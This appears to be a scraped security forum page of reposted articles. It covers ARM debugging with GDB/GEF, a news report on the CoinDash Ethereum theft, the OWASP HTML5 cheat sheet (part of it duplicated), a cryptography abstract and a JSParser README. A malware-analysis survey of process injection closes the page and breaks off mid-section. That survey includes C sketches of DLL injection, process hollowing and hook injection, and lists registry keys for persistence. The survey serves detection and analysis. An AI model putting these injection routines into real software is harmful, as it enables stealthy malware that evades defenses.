0x8084 <max+16>    movlt r0, r1
0x8088 <max+20>    add sp, r11, #0

Examine the registers with info registers or i r:

gef> info registers
r0   0x1        1
r1   0x2        2
r2   0x0        0
r3   0x0        0
r4   0x0        0
r5   0x0        0
r6   0x0        0
r7   0x0        0
r8   0x0        0
r9   0x0        0
r10  0x0        0
r11  0xbefff7e8 3204446184
r12  0x0        0
sp   0xbefff7d8 0xbefff7d8
lr   0x0        0
pc   0x8068     0x8068 <_start+20>
cpsr 0x10       16

The command "info registers" gives you the current register state. We can see the general purpose registers r0-r12, and the special purpose registers SP, LR, and PC, including the status register CPSR. The first four arguments to a function are generally stored in r0-r3. In this case, we manually moved values to r0 and r1.

Show process memory map:

gef> info proc map
process 10225
Mapped address spaces:

Start Addr   End Addr     Size     Offset  objfile
0x8000       0x9000       0x1000   0       /home/pi/lab/max
0xb6fff000   0xb7000000   0x1000   0       [sigpage]
0xbefdf000   0xbf000000   0x21000  0       [stack]
0xffff0000   0xffff1000   0x1000   0       [vectors]

With the command "disassemble" we look through the disassembly output of the function max.

gef> disassemble max
Dump of assembler code for function max:
   0x00008074 <+0>:  push {r11}
   0x00008078 <+4>:  add r11, sp, #0
   0x0000807c <+8>:  sub sp, sp, #12
   0x00008080 <+12>: cmp r0, r1
   0x00008084 <+16>: movlt r0, r1
   0x00008088 <+20>: add sp, r11, #0
   0x0000808c <+24>: pop {r11}
   0x00008090 <+28>: bx lr
End of assembler dump.
GEF-specific commands (more commands can be viewed using the command "gef"):

xfiles – Dump all sections of all loaded ELF images in process memory
vmmap – Enhanced version of proc map, includes RWX attributes in mapped pages
xinfo – Memory attributes at a given address
checksec – Inspect compiler-level protections built into the running binary

gef> xfiles
Start      End        Name   File
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max
0x00008054 0x00008094 .text  /home/pi/lab/max

gef> vmmap
Start      End        Offset     Perm Path
0x00008000 0x00009000 0x00000000 r-x /home/pi/lab/max
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rwx [stack]
0xffff0000 0xffff1000 0x00000000 r-x [vectors]

gef> xinfo 0xbefff7e8
----------------------------------------[ xinfo: 0xbefff7e8 ]----------------------------------------
Found 0xbefff7e8
Page: 0xbefdf000 -> 0xbf000000 (size=0x21000)
Permissions: rwx
Pathname: [stack]
Offset (from page): +0x207e8
Inode: 0

gef> checksec
[+] checksec for '/home/pi/lab/max'
Canary:        No
NX Support:    Yes
PIE Support:   No
RPATH:         No
RUNPATH:       No
Partial RelRO: No
Full RelRO:    No

TROUBLESHOOTING

To make debugging with GDB more efficient, it is useful to know where certain branches/jumps will take us. Certain (newer) versions of GDB resolve the addresses of a branch instruction and show us the name of the target function. For example, the following output of GDB lacks this feature:

...
0x000104f8 <+72>: bl 0x10334
0x000104fc <+76>: mov r0, #8
0x00010500 <+80>: bl 0x1034c
0x00010504 <+84>: mov r3, r0
...

And this is the output of a GDB (natively, without gef) which has the feature I'm talking about:

0x000104f8 <+72>: bl 0x10334 <free@plt>
0x000104fc <+76>: mov r0, #8
0x00010500 <+80>: bl 0x1034c <malloc@plt>
0x00010504 <+84>: mov r3, r0

If you don't have this feature in your GDB, you can either update the Linux sources (and hope that they already have a newer GDB in their repositories) or compile a newer GDB yourself. If you choose to compile GDB yourself, you can use the following commands:

cd /tmp
wget https://ftp.gnu.org/gnu/gdb/gdb-7.12.tar.gz
tar vxzf gdb-7.12.tar.gz
sudo apt-get update
sudo apt-get install libreadline-dev python-dev texinfo -y
cd gdb-7.12
./configure --prefix=/usr --with-system-readline --with-python && make -j4
sudo make -j4 -C gdb/ install
gdb --version

I used the commands provided above to download, compile and run GDB on Raspbian (jessie) without problems. These commands will also replace the previous version of your GDB; if you don't want that, skip the command which ends with the word install. Moreover, I did this while emulating Raspbian in QEMU, so it took me a long time (hours) because of the limited resources (CPU) of the emulated environment. I used GDB version 7.12, but you would most likely succeed even with a newer version (other versions are available from the same GNU FTP directory).

© 2017 Azeria-Labs

Sursa: https://azeria-labs.com/debugging-with-gdb-introduction/
  12. Hacker Steals $7 Million Worth of Ethereum From CoinDash Platform

By Catalin Cimpanu
July 17, 2017

An unknown hacker has taken over the official website of the CoinDash platform and modified an Ethereum wallet address during the company's ICO (Initial Coin Offering).

The hack took place today, just three minutes after CoinDash launched its ICO, which is something similar to an IPO. Many startups today use ICOs to raise funds in the form of cryptocurrency. An ICO happens at predetermined dates when companies publish a cryptocurrency address on their websites, and people start sending funds. After the ICO, the company issues tokens in return, which are the equivalent of real-world stocks.

The hacker breached CoinDash's website

According to a statement published on its website, CoinDash says the hacker took over its website three minutes after the ICO launched and replaced the official Ethereum wallet address with his own. When the company discovered the hack, it shut down its website and notified users of the incident and the end of the ICO.

The company says it received around $6 million worth of Ethereum in the first three minutes, before the hack. The hacker's Ethereum wallet shows a balance of 43,438 Ethereum, which is around $7.8 million. CoinDash estimates that around $7 million of these funds came from its users.

CoinDash will issue tokens to almost all investors

The company was hoping to use the ICO money to fund its Ether social-trading platform. In an official statement, CoinDash has agreed to issue tokens to almost all the persons who sent money to the hacker's wallet:

"CoinDash is responsible to all of its contributors and will send CDTs [CoinDash Tokens] reflective of each contribution. Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly. Transactions sent to any fraudulent address after our website was shut down will not be compensated."

CoinDash is asking investors who sent money to the hacker to fill out this form. There are no other details available about the incident or how the hacker breached CoinDash's systems. The company is still investigating the incident.

Image credit: CoinDash

CATALIN CIMPANU

Catalin Cimpanu is the Security News Editor for Bleeping Computer, where he covers topics such as malware, breaches, vulnerabilities, exploits, hacking news, the Dark Web, and a few more. Catalin previously covered Web & Security news for Softpedia between May 2015 and October 2016. The easiest way to reach Catalin is via his XMPP/Jabber address at campuscodi@xmpp.is. For other contact methods, please visit Catalin's author page.

Sursa: https://www.bleepingcomputer.com/news/security/hacker-steals-7-million-worth-of-ethereum-from-coindash-platform/
  13. HTML5 Security Cheat Sheet

Last revision (mm/dd/yy): 09/9/2015

Contents
1 Introduction
2 Communication APIs
  2.1 Web Messaging
  2.2 Cross Origin Resource Sharing
  2.3 WebSockets
  2.4 Server-Sent Events
3 Storage APIs
  3.1 Local Storage
  3.2 Client-side databases
4 Geolocation
5 Web Workers
6 Sandboxed frames
7 Offline Applications
8 Progressive Enhancements and Graceful Degradation Risks
9 HTTP Headers to enhance security
  9.1 X-Frame-Options
  9.2 X-XSS-Protection
  9.3 Strict Transport Security
  9.4 Content Security Policy
  9.5 Origin
10 Authors and Primary Editors
  10.1 Other Cheatsheets

Introduction

The following cheat sheet serves as a guide for implementing HTML 5 in a secure fashion.

Communication APIs

Web Messaging

Web Messaging (also known as Cross Domain Messaging) provides a means of messaging between documents from different origins in a way that is generally safer than the multiple hacks used in the past to accomplish this task. However, there are still some recommendations to keep in mind:

When posting a message, explicitly state the expected origin as the second argument to postMessage rather than * in order to prevent sending the message to an unknown origin after a redirect or some other means of the target window's origin changing.

The receiving page should always:

Check the origin attribute of the sender to verify the data is originating from the expected location.

Perform input validation on the data attribute of the event to ensure that it's in the desired format.

Don't assume you have control over the data attribute. A single Cross Site Scripting flaw in the sending page allows an attacker to send messages of any given format.

Both pages should only interpret the exchanged messages as data. Never evaluate passed messages as code (e.g. via eval()) or insert them into a page's DOM (e.g. via innerHTML), as that would create a DOM-based XSS vulnerability. For more information see the DOM based XSS Prevention Cheat Sheet.

To assign the data value to an element, instead of using an insecure method like element.innerHTML = data;, use the safer option: element.textContent = data;

Check the origin properly to exactly match the FQDN(s) you expect. Note that the following code:

if(message.origin.indexOf(".owasp.org")!=-1) { /* ... */ }

is very insecure and will not have the desired behavior, as www.owasp.org.attacker.com will match.

If you need to embed external content/untrusted gadgets and allow user-controlled scripts (which is highly discouraged), consider using a JavaScript rewriting framework such as Google Caja or check the information on sandboxed frames.

Cross Origin Resource Sharing

Validate URLs passed to XMLHttpRequest.open. Current browsers allow these URLs to be cross domain; this behavior can lead to code injection by a remote attacker. Pay extra attention to absolute URLs.

Ensure that URLs responding with Access-Control-Allow-Origin: * do not include any sensitive content or information that might aid an attacker in further attacks. Use the Access-Control-Allow-Origin header only on chosen URLs that need to be accessed cross-domain. Don't use the header for the whole domain.

Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use the * wildcard, nor blindly return the Origin header content without any checks).

Keep in mind that CORS does not prevent the requested data from going to an unauthenticated location. It's still important for the server to perform usual CSRF prevention.
While the RFC recommends a pre-flight request with the OPTIONS verb, current implementations might not perform this request, so it's important that "ordinary" (GET and POST) requests perform any access control necessary.

Discard requests received over plain HTTP with HTTPS origins to prevent mixed content bugs.

Don't rely only on the Origin header for Access Control checks. The browser always sends this header in CORS requests, but it may be spoofed outside the browser. Application-level protocols should be used to protect sensitive data.

WebSockets

Drop backward compatibility in implemented clients/servers and use only protocol versions above hybi-00. The popular Hixie-76 version (hybi-00) and older are outdated and insecure. The recommended version, supported in the latest versions of all current browsers, is RFC 6455 (supported by Firefox 11+, Chrome 16+, Safari 6, Opera 12.50, and IE10).

While it's relatively easy to tunnel TCP services through WebSockets (e.g. VNC, FTP), doing so enables access to these tunneled services for the in-browser attacker in case of a Cross Site Scripting attack. These services might also be called directly from a malicious page or program.

The protocol doesn't handle authorization and/or authentication. Application-level protocols should handle that separately in case sensitive data is being transferred.

Process the messages received by the websocket as data. Don't try to assign them directly to the DOM, nor evaluate them as code. If the response is JSON, never use the insecure eval() function; use the safe option JSON.parse() instead.

Endpoints exposed through the ws:// protocol are easily reversible to plain text. Only wss:// (WebSockets over SSL/TLS) should be used for protection against Man-In-The-Middle attacks.

Spoofing the client is possible outside a browser, so the WebSockets server should be able to handle incorrect/malicious input. Always validate input coming from the remote site, as it might have been altered.

When implementing servers, check the Origin: header in the WebSockets handshake. Though it might be spoofed outside a browser, browsers always add the Origin of the page that initiated the WebSockets connection.

As a WebSockets client in a browser is accessible through JavaScript calls, all WebSockets communication can be spoofed or hijacked through Cross Site Scripting. Always validate data coming through a WebSockets connection.

Server-Sent Events

Validate URLs passed to the EventSource constructor, even though only same-origin URLs are allowed.

As mentioned before, process the messages (event.data) as data and never evaluate the content as HTML or script code.

Always check the origin attribute of the message (event.origin) to ensure the message is coming from a trusted domain. Use a whitelist approach.

Storage APIs

Local Storage

Also known as Offline Storage or Web Storage. The underlying storage mechanism may vary from one user agent to the next. In other words, any authentication your application requires can be bypassed by a user with local privileges to the machine on which the data is stored. Therefore, it's recommended not to store any sensitive information in local storage.

Use the object sessionStorage instead of localStorage if persistent storage is not needed. The sessionStorage object is available only to that window/tab until the window is closed.

A single Cross Site Scripting flaw can be used to steal all the data in these objects, so again it's recommended not to store sensitive information in local storage.
    Server-Sent Events

    - Validate URLs passed to the EventSource constructor, even though only same-origin URLs are allowed.
    - As mentioned before, process the messages (event.data) as data and never evaluate the content as HTML or script code.
    - Always check the origin attribute of the message (event.origin) to ensure the message is coming from a trusted domain. Use a whitelist approach.

    Storage APIs

    Local Storage

    - Also known as Offline Storage or Web Storage. The underlying storage mechanism may vary from one user agent to the next. In other words, any authentication your application requires can be bypassed by a user with local privileges to the machine on which the data is stored. Therefore, it's recommended not to store any sensitive information in local storage.
    - Use the sessionStorage object instead of localStorage if persistent storage is not needed. The sessionStorage object is available only to that window/tab until the window is closed.
    - A single Cross Site Scripting flaw can be used to steal all the data in these objects, so again it's recommended not to store sensitive information in local storage.
    - A single Cross Site Scripting flaw can be used to load malicious data into these objects too, so don't consider objects in these stores to be trusted.
    - Pay extra attention to localStorage.getItem and setItem calls implemented in HTML5 pages. It helps in detecting when developers build solutions that put sensitive information in local storage, which is a bad practice.
    - Do not store session identifiers in local storage, as the data is always accessible by JavaScript. Cookies can mitigate this risk using the httpOnly flag.
    - There is no way to restrict the visibility of an object to a specific path, as with the path attribute of HTTP Cookies; every object is shared within an origin and protected with the Same Origin Policy. Avoid hosting multiple applications on the same origin; all of them would share the same localStorage object. Use different subdomains instead.

    Client-side databases

    - In November 2010, the W3C announced Web SQL Database (a relational SQL database) as a deprecated specification. A new standard, the Indexed Database API or IndexedDB (formerly WebSimpleDB), is actively developed; it provides key/value database storage and methods for performing advanced queries.
    - Underlying storage mechanisms may vary from one user agent to the next. In other words, any authentication your application requires can be bypassed by a user with local privileges to the machine on which the data is stored. Therefore, it's recommended not to store any sensitive information in local storage.
    - If utilized, WebDatabase content on the client side can be vulnerable to SQL injection and needs to have proper validation and parameterization.
    - Like Local Storage, a single Cross Site Scripting flaw can be used to load malicious data into a web database as well. Don't consider data in these to be trusted.

    Geolocation

    - The Geolocation RFC recommends that the user agent ask the user's permission before calculating location. Whether or how this decision is remembered varies from browser to browser. Some user agents require the user to visit the page again in order to turn off the ability to get the user's location without asking, so for privacy reasons, it's recommended to require user input before calling getCurrentPosition or watchPosition.

    Web Workers

    - Web Workers are allowed to use the XMLHttpRequest object to perform in-domain and Cross Origin Resource Sharing requests. See the relevant section of this Cheat Sheet to ensure CORS security.
    - While Web Workers don't have access to the DOM of the calling page, malicious Web Workers can use excessive CPU for computation, leading to a Denial of Service condition, or abuse Cross Origin Resource Sharing for further exploitation. Ensure code in all Web Worker scripts is not malevolent. Don't allow creating Web Worker scripts from user-supplied input.
    - Validate messages exchanged with a Web Worker. Do not try to exchange snippets of JavaScript for evaluation, e.g. via eval(), as that could introduce a DOM-based XSS vulnerability (a sketch follows this list).
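    A minimal sketch of treating worker messages as data (the worker.js path and the message shape are illustrative):

      var worker = new Worker('worker.js');
      worker.onmessage = function (event) {
        var msg;
        try { msg = JSON.parse(event.data); } catch (e) { return; } // data, never eval()
        if (typeof msg.progress !== 'number') return;               // validate the shape
        document.getElementById('bar').textContent = msg.progress + '%';
      };
      worker.postMessage(JSON.stringify({ cmd: 'start' }));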
    Sandboxed frames

    - Use the sandbox attribute of an iframe for untrusted content. The sandbox attribute of an iframe enables restrictions on content within an iframe. The following restrictions are active when the sandbox attribute is set:
      - All markup is treated as being from a unique origin.
      - All forms and scripts are disabled.
      - All links are prevented from targeting other browsing contexts.
      - All features that trigger automatically are blocked.
      - All plugins are disabled.
    - It is possible to have fine-grained control over iframe capabilities using the value of the sandbox attribute.
    - In old versions of user agents where this feature is not supported, this attribute will be ignored. Use this feature as an additional layer of protection, or check if the browser supports sandboxed frames and only show the untrusted content if supported.
    - Apart from this attribute, to prevent Clickjacking attacks and unsolicited framing it is encouraged to use the X-Frame-Options header, which supports the deny and same-origin values. Other solutions, like framebusting (if (window !== window.top) { window.top.location = location; }), are not recommended.

    Offline Applications

    - Whether the user agent asks the user for permission to store data for offline browsing, and when this cache is deleted, varies from one browser to the next. Cache poisoning is an issue if a user connects through insecure networks, so for privacy reasons it is encouraged to require user input before sending any manifest file.
    - Users should only cache trusted websites and clean the cache after browsing through open or insecure networks.

    Progressive Enhancements and Graceful Degradation Risks

    The best practice now is to determine the capabilities that a browser supports and augment with some type of substitute for capabilities that are not directly supported. This may mean an onion-like element, e.g. falling through to a Flash Player if the <video> tag is unsupported, or it may mean additional scripting code from various sources that should be code reviewed.

    HTTP Headers to enhance security

    X-Frame-Options

    This header can be used to prevent Clickjacking in modern browsers. Use the same-origin value to allow framing from URLs of the same origin, or deny to block all framing. Example:

      X-Frame-Options: DENY

    For more information on Clickjacking Defense please see the Clickjacking Defense Cheat Sheet.

    X-XSS-Protection

    Enable the XSS filter (only works for Reflected XSS). Example:

      X-XSS-Protection: 1; mode=block

    Strict Transport Security

    Force every browser request to be sent over TLS/SSL (this can prevent SSL strip attacks). Use includeSubDomains. Example:

      Strict-Transport-Security: max-age=8640000; includeSubDomains

    Content Security Policy

    A policy to define a set of content restrictions for web resources, which aims to mitigate web application vulnerabilities such as Cross Site Scripting. Example:

      Content-Security-Policy: allow 'self'; img-src *; object-src media.example.com; script-src js.example.com

    Origin

    Sent by CORS/WebSockets requests. There is a proposal to use this header to mitigate CSRF attacks, but it is not yet implemented by vendors for this purpose.

    Authors and Primary Editors

    Mark Roxberry - mark.roxberry [at] owasp.org
    Krzysztof Kotowicz - krzysztof [at] kotowicz.net
    Will Stranathan - will [at] cltnc.us
    Shreeraj Shah - shreeraj.shah [at] blueinfy.net
    Juan Galiana Lara - jgaliana [at] owasp.org

    Sursa: https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
  14. Nytro

    Fun stuff

    What do we actually take away from what gets posted on the forum? https://img-9gag-fun.9cache.com/photo/ad9XZjB_460sv.mp4
  15. Farfalle: parallel permutation-based cryptography

    Guido Bertoni (1), Joan Daemen (1,2), Seth Hoffert, Michaël Peeters (1), Gilles Van Assche (1), and Ronny Van Keer (1)
    (1) STMicroelectronics
    (2) Radboud University

    Abstract. In this paper, we introduce Farfalle, a new permutation-based construction for building a pseudorandom function (PRF). The PRF takes as input a key and a sequence of arbitrary-length data strings, and returns an arbitrary-length output. It has a compression layer and an expansion layer, each involving the parallel application of a permutation. The construction also makes use of LFSR-like rolling functions for generating input and output masks and for updating the inner state during expansion. On top of the inherent parallelism, Farfalle instances can be very efficient because the construction imposes fewer requirements on the underlying primitive than, e.g., the duplex construction or typical block cipher modes. Farfalle has an incremental property: compression of common prefixes of inputs can be factored out. Thanks to its input-output characteristics, Farfalle is really versatile. We specify simple modes on top of it for authentication, encryption and authenticated encryption, as well as a wide block cipher mode. As a showcase, we present Kravatte, a very efficient instance of Farfalle based on Keccak-p[1600, nr] permutations, and formulate concrete security claims against classical and quantum adversaries. The permutations in the compression and expansion layers of Kravatte have only 6 and 4 rounds respectively, and the rolling function is lightweight. We provide a rationale for our choices and report on software performance.

    Download: https://eprint.iacr.org/2016/1188.pdf
  16. Nytro

    JSParser

    JSParser

    A Python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting.

    Dependencies

    - safeurl
    - tornado
    - jsbeautifier

    Installing

      $ python setup.py install

    Running

    Run handler.py and then visit http://localhost:8008.

      $ python handler.py

    Authors

    - https://twitter.com/bbuerhaus/
    - https://twitter.com/nahamsec/

    Inspired By

    - https://twitter.com/jobertabma/

    References

    - http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/
    - http://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/

    Changelog

    1.0 - Release

    Sursa: https://github.com/nahamsec/JSParser
  17. Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques

    Ashkan Hosseini
    JULY 18, 2017

    Process injection is a widespread defense evasion technique employed often within malware and fileless adversary tradecraft, and entails running custom code within the address space of another process. Process injection improves stealth, and some techniques also achieve persistence. Although there are numerous process injection techniques, in this blog I present ten techniques seen in the wild that run malware code on behalf of another process. I additionally provide screenshots for many of these techniques to facilitate reverse engineering and malware analysis, assisting detection and defense against these common techniques.

    1. CLASSIC DLL INJECTION VIA CREATEREMOTETHREAD AND LOADLIBRARY

    This technique is one of the most common techniques used to inject malware into another process. The malware writes the path to its malicious dynamic-link library (DLL) in the virtual address space of another process, and ensures the remote process loads it by creating a remote thread in the target process.

    The malware first needs to target a process for injection (e.g. svchost.exe). This is usually done by searching through processes by calling a trio of Application Program Interfaces (APIs): CreateToolhelp32Snapshot, Process32First, and Process32Next. CreateToolhelp32Snapshot is an API used for enumerating heap or module states of a specified process or all processes, and it returns a snapshot. Process32First retrieves information about the first process in the snapshot, and then Process32Next is used in a loop to iterate through them. After finding the target process, the malware gets the handle of the target process by calling OpenProcess.

    As shown in Figure 1, the malware calls VirtualAllocEx to have a space to write the path to its DLL. The malware then calls WriteProcessMemory to write the path in the allocated memory. Finally, to have the code executed in another process, the malware calls APIs such as CreateRemoteThread, NtCreateThreadEx, or RtlCreateUserThread. The latter two are undocumented. However, the general idea is to pass the address of LoadLibrary to one of these APIs so that a remote process has to execute the DLL on behalf of the malware.

    CreateRemoteThread is tracked and flagged by many security products. Further, it requires a malicious DLL on disk which could be detected. Considering that attackers are most commonly injecting code to evade defenses, sophisticated attackers probably will not use this approach. The screenshot below displays a malware named Rebhip performing this technique.

    Figure 1: Rebhip worm performing a typical DLL injection
    Sha256: 07b8f25e7b536f5b6f686c12d04edc37e11347c8acd5c53f98a174723078c365
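    As a rough, self-contained C sketch of this call sequence (the PID and DLL path would come from the process enumeration described above; error handling is reduced to early returns):

      #include <windows.h>
      #include <string.h>

      BOOL inject_dll(DWORD pid, const char *dllPath)
      {
          HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
          if (!hProc) return FALSE;

          /* Reserve room in the target for the DLL path */
          SIZE_T len = strlen(dllPath) + 1;
          LPVOID remote = VirtualAllocEx(hProc, NULL, len,
                                         MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
          if (!remote) { CloseHandle(hProc); return FALSE; }

          /* Write the path, then have the target call LoadLibraryA on it;
             kernel32 is mapped at the same base in every process */
          WriteProcessMemory(hProc, remote, dllPath, len, NULL);
          LPTHREAD_START_ROUTINE pLoadLib = (LPTHREAD_START_ROUTINE)
              GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");

          HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, pLoadLib, remote, 0, NULL);
          if (hThread) { WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); }

          CloseHandle(hProc);
          return hThread != NULL;
      }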
    2. PORTABLE EXECUTABLE INJECTION (PE INJECTION)

    Instead of passing the address of LoadLibrary, malware can copy its malicious code into an existing open process and cause it to execute (either via a small shellcode, or by calling CreateRemoteThread). One advantage of PE injection over the LoadLibrary technique is that the malware does not have to drop a malicious DLL on the disk. Similar to the first technique, the malware allocates memory in a host process (e.g. VirtualAllocEx), and instead of writing a "DLL path" it writes its malicious code by calling WriteProcessMemory. However, the obstacle with this approach is the change of the base address of the copied image. When a malware injects its PE into another process it will have a new base address which is unpredictable, requiring it to dynamically recompute the fixed addresses of its PE. To overcome this, the malware needs to find its relocation table address in the host process, and resolve the absolute addresses of the copied image by looping through its relocation descriptors.

    This technique is similar to other techniques, such as reflective DLL injection and memory module, since they do not drop any files to the disk. However, memory module and reflective DLL injection approaches are even stealthier. They do not rely on any extra Windows APIs (e.g., CreateRemoteThread or LoadLibrary), because they load and execute themselves in the memory. Reflective DLL injection works by creating a DLL that maps itself into memory when executed, instead of relying on the Windows loader. Memory Module is similar to reflective DLL injection, except the injector or loader is responsible for mapping the target DLL into memory instead of the DLL mapping itself. In a previous blog post, these two in-memory approaches were discussed extensively.

    When analyzing PE injection, it is very common to see loops (usually two "for" loops, one nested in the other) before a call to CreateRemoteThread. This technique is quite popular among crypters (software that encrypts and obfuscates malware). In Figure 2, the sample unit test is taking advantage of this technique. The code has two nested loops to adjust its relocation table that can be seen before the calls to WriteProcessMemory and CreateRemoteThread. The "and 0x0fff" instruction is also another good indicator, showing that the first 12 bits are used to get the offset into the virtual address of the containing relocation block. Now that the malware has recomputed all the necessary addresses, all it needs to do is pass its starting address to CreateRemoteThread and have it executed.

    Figure 2: Example structure of the loops for PE injection prior to calls to CreateRemoteThread
    Sha256: ce8d7590182db2e51372a4a04d6a0927a65b2640739f9ec01cfd6c143b1110da

    3. PROCESS HOLLOWING (A.K.A PROCESS REPLACEMENT AND RUNPE)

    Instead of injecting code into a host program (e.g., DLL injection), malware can perform a technique known as process hollowing. Process hollowing occurs when a malware unmaps (hollows out) the legitimate code from memory of the target process, and overwrites the memory space of the target process (e.g., svchost.exe) with a malicious executable.

    The malware first creates a new process to host the malicious code in suspended mode. As shown in Figure 3, this is done by calling CreateProcess and setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004). The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called. Next, the malware needs to swap out the contents of the legitimate file with its malicious payload. This is done by unmapping the memory of the target process by calling either ZwUnmapViewOfSection or NtUnmapViewOfSection. These two APIs basically release all memory pointed to by a section. Now that the memory is unmapped, the loader performs VirtualAllocEx to allocate new memory for the malware, and uses WriteProcessMemory to write each of the malware's sections to the target process space. The malware calls SetThreadContext to point the entrypoint to a new code section that it has written. At the end, the malware resumes the suspended thread by calling ResumeThread to take the process out of suspended state.

    Figure 3: Ransom.Cryak performing process hollowing
    Sha256: eae72d803bf67df22526f50fc7ab84d838efb2865c27aef1a61592b1c520d144
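    A compressed C sketch of the hollowing sequence (x86 only, since EAX carries the entrypoint in a suspended thread's CONTEXT; PE parsing and per-section copying are omitted, and the host path, payload buffer and entrypoint RVA are placeholders):

      #include <windows.h>

      typedef LONG (NTAPI *NtUnmapViewOfSection_t)(HANDLE, PVOID);

      void hollow(const char *hostPath, LPVOID payload, SIZE_T size,
                  LPVOID imageBase, DWORD entryRva)
      {
          STARTUPINFOA si = { sizeof(si) };
          PROCESS_INFORMATION pi;

          /* 1. Create the host with its primary thread suspended */
          if (!CreateProcessA(hostPath, NULL, NULL, NULL, FALSE,
                              CREATE_SUSPENDED, NULL, NULL, &si, &pi)) return;

          /* 2. Hollow out the legitimate image */
          NtUnmapViewOfSection_t NtUnmap = (NtUnmapViewOfSection_t)
              GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
          NtUnmap(pi.hProcess, imageBase);

          /* 3. Map the payload into the freed region */
          LPVOID base = VirtualAllocEx(pi.hProcess, imageBase, size,
                                       MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
          WriteProcessMemory(pi.hProcess, base, payload, size, NULL);

          /* 4. Redirect the suspended thread to the new entrypoint and resume */
          CONTEXT ctx;
          ctx.ContextFlags = CONTEXT_FULL;
          GetThreadContext(pi.hThread, &ctx);
          ctx.Eax = (DWORD)(ULONG_PTR)base + entryRva;
          SetThreadContext(pi.hThread, &ctx);
          ResumeThread(pi.hThread);
      }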
    4. THREAD EXECUTION HIJACKING (A.K.A SUSPEND, INJECT, AND RESUME (SIR))

    This technique has some similarities to the process hollowing technique previously discussed. In thread execution hijacking, malware targets an existing thread of a process and avoids any noisy process or thread creation operations. Therefore, during analysis you will probably see calls to CreateToolhelp32Snapshot and Thread32First followed by OpenThread.

    After getting a handle to the target thread, the malware puts the thread into suspended mode by calling SuspendThread to perform its injection. The malware calls VirtualAllocEx and WriteProcessMemory to allocate memory and perform the code injection. The code can contain shellcode, the path to the malicious DLL, and the address of LoadLibrary.

    Figure 4 illustrates a generic trojan using this technique. In order to hijack the execution of the thread, the malware modifies the EIP register (a register that contains the address of the next instruction) of the targeted thread by calling SetThreadContext. Afterwards, the malware resumes the thread to execute the shellcode that it has written to the host process. From the attacker's perspective, the SIR approach can be problematic because suspending and resuming a thread in the middle of a system call can cause the system to crash. To avoid this, a more sophisticated malware would resume and retry later if the EIP register is within the range of NTDLL.dll.

    Figure 4: A generic trojan performing thread execution hijacking
    Sha256: 787cbc8a6d1bc58ea169e51e1ad029a637f22560660cc129ab8a099a745bd50e

    5. HOOK INJECTION VIA SETWINDOWSHOOKEX

    Hooking is a technique used to intercept function calls. Malware can leverage hooking functionality to have their malicious DLL loaded upon an event getting triggered in a specific thread. This is usually done by calling SetWindowsHookEx to install a hook routine into the hook chain. The SetWindowsHookEx function takes four arguments. The first argument is the type of event. The events reflect the range of hook types, and vary from pressing keys on the keyboard (WH_KEYBOARD) to inputs to the mouse (WH_MOUSE), CBT, etc. The second argument is a pointer to the function the malware wants to invoke upon the event execution. The third argument is the module that contains the function. Thus, it is very common to see calls to LoadLibrary and GetProcAddress before calling SetWindowsHookEx. The last argument to this function is the thread with which the hook procedure is to be associated. If this value is set to zero, all threads perform the action when the event is triggered. However, malware usually targets one thread for less noise, thus it is also possible to see calls to CreateToolhelp32Snapshot and Thread32Next before SetWindowsHookEx to find and target a single thread. Once the DLL is injected, the malware executes its malicious code on behalf of the process whose threadId was passed to the SetWindowsHookEx function. In Figure 5, Locky Ransomware implements this technique.

    Figure 5: Locky Ransomware using hook injection
    Sha256: 5d6ddb8458ee5ab99f3e7d9a21490ff4e5bc9808e18b9e20b6dc2c5b27927ba1
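    A short C sketch of the four-argument call described above (the DLL name and its exported hook procedure are hypothetical):

      #include <windows.h>

      BOOL install_hook(DWORD threadId)
      {
          /* Load the DLL locally and resolve the exported hook procedure */
          HMODULE hDll = LoadLibraryA("payload.dll");                 /* placeholder */
          if (!hDll) return FALSE;
          HOOKPROC proc = (HOOKPROC)GetProcAddress(hDll, "HookProc"); /* placeholder */
          if (!proc) return FALSE;

          /* The DLL gets mapped into the target process once a keyboard
             event is delivered to threadId (0 would mean: all threads) */
          return SetWindowsHookExA(WH_KEYBOARD, proc, hDll, threadId) != NULL;
      }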
    6. INJECTION AND PERSISTENCE VIA REGISTRY MODIFICATION (E.G. APPINIT_DLLS, APPCERTDLLS, IFEO)

    AppInit_DLLs, AppCertDlls, and IFEO (Image File Execution Options) are all registry keys that malware uses for both injection and persistence. The entries are located at the following locations:

      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls
      HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls
      HKLM\System\CurrentControlSet\Control\Session Manager\AppCertDlls
      HKLM\Software\Microsoft\Windows NT\currentversion\image file execution options

    AppInit_DLLs

